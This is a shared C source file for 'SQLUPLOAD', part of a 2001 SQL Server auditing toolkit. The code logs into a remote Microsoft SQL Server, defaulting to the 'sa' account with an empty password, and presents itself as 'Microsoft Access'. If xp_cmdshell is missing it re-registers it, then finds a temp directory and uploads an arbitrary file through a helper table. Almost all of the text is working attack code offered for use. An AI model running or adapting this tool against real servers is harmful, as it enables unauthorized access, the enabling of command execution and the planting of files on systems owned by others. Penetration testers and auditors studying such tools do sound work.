Xylitol

SQL Auditing Tools

Jan 28th, 2013
  1. /*
  2.    SQL Auditing Tools
  3.    Copyright (C) Patrik Karlsson 2001
  4.    
  5.    This program is free software; you can redistribute it and/or modify
  6.    it under the terms of the GNU General Public License as published by
  7.    the Free Software Foundation; either version 2 of the License, or
  8.    (at your option) any later version.
  9.    
  10.    This program is distributed in the hope that it will be useful,
  11.    but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.    GNU General Public License for more details.
  14.    
  15.    You should have received a copy of the GNU General Public License
  16.    along with this program; if not, write to the Free Software
  17.    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  18. */
  19.  
  20. #include <tds.h>
  21. #include <tdsconvert.h>
  22. #include "sqlupload.h"
  23. #include "sqllib.h"
  24. #include "util.h"
  25. #include "constants.h"
  26. #include <getopt.h>
  27.  
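  /*
    Allocate a TDSLOGIN and fill in the defaults used when the command line
    does not override them: user "sa" with an empty password, port 1433,
    packet size 512, empty server name.

    The value passed in `login` is ignored and overwritten; the parameter is
    kept so existing callers compile unchanged.

    Returns the new login, or NULL when tds_alloc_login() fails.  The caller
    releases the result with tds_free_login().
  */
  TDSLOGIN *set_target_defaults(TDSLOGIN *login) {

    login = tds_alloc_login();
    if ( login == NULL )
      return NULL;   /* do not hand a NULL login to the setters below */

    /* account and endpoint */
    tds_set_user(login, "sa");
    tds_set_passwd(login, "");
    tds_set_server(login, "");
    tds_set_port(login, 1433);

    /* client identity presented at login; presumably what the server
       records for this session (application "Microsoft Access", host "xxx") */
    tds_set_app(login, "Microsoft Access");
    tds_set_host(login, "xxx");
    tds_set_library(login, "TDS-Library");

    /* session settings */
    tds_set_client_charset(login, "iso_1");
    tds_set_language(login, "us_english");
    tds_set_packet(login, 512);

    return login;

  }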
  48.  
  /*
    Print the banner and the option summary to stdout.
    argv[0] is shown as the program name.  The '*' after an option letter
    presumably marks it as required.
  */
  void usage(char **argv) {

    /* one entry per option line, printed in this order */
    static const char *const option_lines[] = {
      "\t\t-i* <ipaddress> to probe\n",
      "\t\t-t  port (default 1433)\n",
      "\t\t-f* <filename> to upload\n",
      "\t\t-u username\n",
      "\t\t-p password\n",
      "\t\t-T path to tempdir if not autodetected\n",
      "\t\t-h this\n",
      "\t\t-v verbose\n\n"
    };
    size_t idx;

    printf("\tSQLUPLOAD %s by [email protected]\n", SQLTOOLS_VERSION);
    printf("\t------------------------------------\n");
    printf("\tusage: %s [options]\n\n", argv[0]);

    for ( idx = 0; idx < sizeof(option_lines) / sizeof(option_lines[0]); idx++ )
      printf("%s", option_lines[idx]);

  }
  68.  
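  /*
    Log in to the SQL Server described by args and upload args.filename into
    a temp directory on it.

    Order of work: check that the local file exists (the process exits if it
    does not), build the login from the defaults plus args, connect, make
    sure xp_cmdshell is registered (trying to register it from xpsql70.dll
    when it is missing), pick or verify the temp directory, create the helper
    table, upload, drop the helper table.

    Changes made on the target, useful when reading its audit trail: a login
    as args.sUser ("sa" when none was given), a possible registration of
    xp_cmdshell (presumably via sp_addextendedproc on the server), and
    creation and removal of the helper table.  When this run found
    xp_cmdshell missing, it is dropped again on every exit path after login
    so the server is not left with an extended procedure it did not have.

    Returns TRUE only when the upload and the helper-table drop both
    succeeded, otherwise FALSE.
  */
  int SQLUpload(struct args_struct args) {

    /* dirs to try to upload to */
    char *pDirs[5] = {"c:\\temp", "c:\\winnt\\temp", "d:\\temp",
                      "e:\\temp", "c:\\"};
    /* NOTE(review): only the first four entries are probed, so "c:\\" is
       never tried -- confirm whether that is intended */
    int i, nDirCount = 4;

    TDSLOGIN *login = NULL;
    TDSSOCKET *tds = NULL;
    TDSCONTEXT *context = NULL;
    char *pUploadFileName = NULL;
    char bLooser = 0;   /* set when xp_cmdshell was missing at login */
    int rc = FALSE;

    /* check if the file actually exists */
    if ( !fileExist(args.filename) ) {
      fprintf(stderr, "ERROR: Could not find filename: %s\n", args.filename);
      exit(1);
    }

    pUploadFileName = getFilenameFromPath(args.filename);

    login = set_target_defaults(login);
    if ( login == NULL ) {
      fprintf(stderr, "ERROR: Could not allocate login structure\n");
      goto out;
    }

    /* no username supplied, assuming sa (args is a by-value copy) */
    if ( strlen(args.sUser) == 0 )
      strcpy(args.sUser, "sa");

    /* set the parameters of the login struct */
    tds_set_server(login, args.sIP);
    tds_set_passwd(login, args.sPass);
    tds_set_user(login, args.sUser);
    tds_set_port(login, args.nPort);

    /* a username without a backslash selects TDS protocol version 4.2 */
    if ( strchr(args.sUser, '\\') == NULL )
      tds_set_version(login, (short) 4, (short) 2);

    if ( args.verbose )
      printf("-- Logging in to %s --\n", args.sIP);

    context = tds_alloc_context();
    if ( context == NULL ) {
      fprintf(stderr, "ERROR: Could not allocate TDS context\n");
      goto out;
    }
    if ( context->locale && !context->locale->date_fmt ) {
      /* set default in case there's no locale file */
      context->locale->date_fmt = strdup("%b %e %Y %l:%M%p");
    }

    tds = tds_alloc_socket(context, 512);
    if ( tds == NULL ) {
      fprintf(stderr, "ERROR: Could not allocate TDS socket\n");
      goto out;
    }
    tds_set_parent(tds, NULL);

    /* connect_info is not declared in this function; presumably it is
       declared at file scope by one of the project headers -- TODO confirm */
    connect_info = tds_read_config_info(NULL, login, context->locale);

    /* try to login.  The original compared the 0/1 result of
       (!connect_info || tds_connect(...)) with TDS_FAIL, so a NULL
       connect_info could be taken for a successful login. */
    if ( connect_info == NULL || tds_connect(tds, connect_info) == TDS_FAIL ) {
      if ( connect_info != NULL )
        tds_free_connect(connect_info);
      fprintf(stderr, "ERROR: Login failed ...\n");
      goto out;
    }
    tds_free_connect(connect_info);

    /* check for xp_cmdshell */
    if ( !ifExistsXP(tds, "xp_cmdshell") ) {
      fprintf(stderr, "WARNING: could not find xp_cmdshell\n");
      fprintf(stderr, "INFO: Trying to add xp_cmdshell\n");

      if ( sp_addextendedproc(tds, "xp_cmdshell", "xpsql70.dll") )
        fprintf(stderr, "INFO: Added xp_cmdshell\n");
      else {
        fprintf(stderr, "WARNING: Failed to add xp_cmdshell\n");
        sqlExec(tds, "drop procedure xp_cmdshell\n");
      }

      bLooser = 1;
    }

    /* drop any helper table left over from an earlier run */
    dropHaxorTable(tds);

    if ( strlen(args.sTempPath) == 0 ) {
      /* no path supplied, try to find one */
      if ( args.verbose )
        printf("-- Searching for temp path --\n");

      /* no break: the last candidate that exists wins */
      for ( i = 0; i < nDirCount; i++ ) {
        if ( dirExists(tds, pDirs[i]) )
          strcpy(args.sTempPath, pDirs[i]);
      }

      if ( strlen(args.sTempPath) == 0 ) {
        fprintf(stderr, "ERROR: No temp path found\n");
        goto restore;
      }
    }
    else if ( !dirExists(tds, args.sTempPath) ) {
      /* the user supplied an upload dir that is not there */
      fprintf(stderr, "ERROR: The temp path was not found\n");
      goto restore;
    }

    fprintf(stdout, "Your file will be in %s\n", args.sTempPath);

    /* create the helper table; a failure is reported and the upload is
       still attempted, as before */
    if ( !createHaxorTable(tds) )
      printf("Error creating haxortable!\n");

    if ( args.verbose )
      printf("-- Uploading %s --\n", args.filename);

    rc = TRUE;

    /* do the actual uploading; a failed upload now makes the call return FALSE */
    if ( uploadFile(tds, args.filename, pUploadFileName, args.sTempPath) != TRUE ) {
      fprintf(stderr, "ERROR: Error uploading file!\n");
      rc = FALSE;
    }

    /* drop the helper table */
    if ( !dropHaxorTable(tds) ) {
      printf("Error dropping haxortable!\n");
      rc = FALSE;
    }

  restore:
    /* xp_cmdshell was missing when we logged in: remove it again */
    if ( bLooser )
      sqlExec(tds, "drop procedure xp_cmdshell");

  out:
    /* NOTE(review): tds and context are not released here, as in the
       original; the matching FreeTDS teardown calls should be confirmed
       against the library version this links with */
    if ( login != NULL )
      tds_free_login(login);
    free(pUploadFileName);

    return rc;

  }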
  214.  
  /*
    Put *pArgs into its starting state: verbose off, port 1433 and every
    string field zero-filled, so each one reads as an empty string.
  */
  void initArguments(struct args_struct *pArgs) {

    /* scalar options */
    pArgs->nPort = 1433;
    pArgs->verbose = FALSE;

    /* string fields, cleared over their full size */
    memset(pArgs->filename, 0, sizeof(pArgs->filename));
    memset(pArgs->sTempPath, 0, sizeof(pArgs->sTempPath));
    memset(pArgs->sIP, 0, sizeof(pArgs->sIP));
    memset(pArgs->sUser, 0, sizeof(pArgs->sUser));
    memset(pArgs->sPass, 0, sizeof(pArgs->sPass));

  }
  229.  
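  /*
    Copy one option value into a fixed-size field of the argument struct.
    Exits with an error message instead of overflowing the field or storing
    a truncated, unterminated value.  opt is the option letter, used only in
    the message.
  */
  static void copyOption(char *dst, size_t dstSize, const char *src, char opt) {

    int n = snprintf(dst, dstSize, "%s", src);

    if ( n < 0 || (size_t) n >= dstSize ) {
      fprintf(stderr, "ERROR: argument to -%c is too long\n", opt);
      exit(1);
    }

  }

  /*
    MAIN

    Parse the command line into an args_struct and run SQLUpload.
    -i and -f are required.  Every string option is length-checked against
    its destination field; the original copied -u, -p and -T with no bound
    and could leave -f and -i without a terminating NUL.

    Exit status: 0 when SQLUpload reports success, 1 on any error or when
    usage is printed.  (The original returned SQLUpload's TRUE/FALSE
    directly, so a successful run exited non-zero, assuming TRUE is
    non-zero.)
  */
  int main(int argc, char **argv) {

    struct args_struct args;
    int c;
    char *end;
    long port;

    initArguments(&args);

    while ( (c = getopt(argc, argv, "i:u:p:vt:hf:T:")) != -1 ) {

      switch (c) {

      case 'f':
        copyOption(args.filename, sizeof(args.filename), optarg, 'f');
        break;

      case 'i':
        copyOption(args.sIP, sizeof(args.sIP), optarg, 'i');
        break;

      case 'u':
        copyOption(args.sUser, sizeof(args.sUser), optarg, 'u');
        break;

      case 'p':
        /* a password given on the command line is visible in the process
           list and shell history of the host running the tool */
        copyOption(args.sPass, sizeof(args.sPass), optarg, 'p');
        break;

      case 'T':
        copyOption(args.sTempPath, sizeof(args.sTempPath), optarg, 'T');
        break;

      case 't':
        /* strtol instead of atoi: reject non-numeric and out-of-range ports */
        port = strtol(optarg, &end, 10);
        if ( end == optarg || *end != '\0' || port < 1 || port > 65535 ) {
          fprintf(stderr, "ERROR: invalid port: %s\n", optarg);
          exit(1);
        }
        args.nPort = (int) port;
        break;

      case 'v':
        args.verbose = TRUE;
        break;

      case 'h':
      default:
        usage(argv);
        exit(1);
      }

    }

    /* check for needed params: usage marks both -i and -f as required */
    if ( strlen(args.sIP) == 0 || strlen(args.filename) == 0 ) {
      usage(argv);
      exit(1);
    }

    fprintf(stdout, "SQLUpload by Patrik Karlsson "
        "<[email protected]>\n\n");

    return SQLUpload(args) ? 0 : 1;

  }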